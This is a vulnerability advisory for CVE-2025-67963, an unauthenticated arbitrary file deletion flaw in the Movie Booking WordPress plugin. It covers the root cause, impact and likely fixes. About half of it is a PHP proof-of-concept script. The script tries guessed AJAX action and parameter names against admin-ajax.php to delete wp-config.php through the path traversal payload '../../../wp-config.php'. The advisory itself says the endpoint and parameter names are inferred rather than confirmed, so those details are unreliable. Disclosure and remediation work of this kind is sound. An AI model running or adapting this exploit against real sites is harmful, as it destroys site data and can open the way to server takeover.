Atomic Edge analysis of CVE-2025-67963 (metadata-based):
This vulnerability is an unauthenticated arbitrary file deletion flaw in the Movie Booking WordPress plugin, affecting all versions up to and including 1.1.5. The vulnerability stems from a path traversal weakness in a plugin function, allowing attackers to delete any file on the server. The CVSS score of 9.1 reflects the high impact and ease of exploitation.
Atomic Edge research infers the root cause is improper path validation, as indicated by CWE-22 (Path Traversal). The plugin likely accepts user input for a file path parameter without properly restricting it to a safe directory. This input is then used directly in a file deletion operation like `unlink()`. The vulnerability description confirms the flaw exists, but the exact function name and endpoint are inferred from common WordPress plugin patterns.
The exploitation method likely involves sending a request to a WordPress AJAX endpoint, such as `/wp-admin/admin-ajax.php`. The request would contain an `action` parameter corresponding to a vulnerable plugin hook, like `movie_booking_delete_file`. A second parameter, perhaps named `file`, would contain a relative path traversal payload (e.g., `../../../wp-config.php`). The attacker sends this request without authentication, and the plugin processes it due to missing capability checks and nonce verification.
Effective remediation requires implementing proper input validation and authorization. The patched version (1.1.6) likely added a capability check (e.g., `current_user_can(‘manage_options’)`) to restrict access to administrators. It also likely implemented path sanitization, using functions like `realpath()` and `sanitize_file_name()`, and then validated that the final resolved path is within the intended plugin directory before performing any file operation.
Successful exploitation leads to complete loss of confidentiality, integrity, and availability. Deleting the `wp-config.php` file causes site outage and can enable remote code execution by forcing WordPress into setup mode. Deleting other critical files can disrupt the operating system or application, leading to a full site compromise. This vulnerability provides a direct path to server control.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-67963 - Movie Booking <= 1.1.5 - Unauthenticated Arbitrary File Deletion
<?php
/**
* Proof-of-Concept for CVE-2025-67963.
* This script attempts to exploit a path traversal vulnerability to delete a file.
* The target endpoint and parameter names are inferred from common WordPress plugin patterns.
* Assumptions:
* 1. The vulnerable endpoint is /wp-admin/admin-ajax.php.
* 2. The AJAX action hook is related to the plugin slug (movie_booking).
* 3. A parameter like 'file' or 'path' accepts user input.
* 4. No authentication or nonce is required.
*/
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS
// The file to delete. Using wp-config.php as it leads to RCE.
$file_to_delete = '../../../wp-config.php';
// Common inferred AJAX action names for a delete function.
$possible_actions = [
'movie_booking_delete_file',
'movie_booking_remove_file',
'mb_delete_file'
];
// Common inferred parameter names for the file path.
$possible_params = ['file', 'file_path', 'path', 'filename'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
foreach ($possible_actions as $action) {
foreach ($possible_params as $param) {
$post_data = [
'action' => $action,
$param => $file_to_delete
];
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[*] Trying action: {$action}, param: {$param}n";
echo " HTTP Code: {$http_code}n";
echo " Response: " . substr($response, 0, 200) . "nn";
// Brief pause between attempts
sleep(1);
}
}
curl_close($ch);
?>
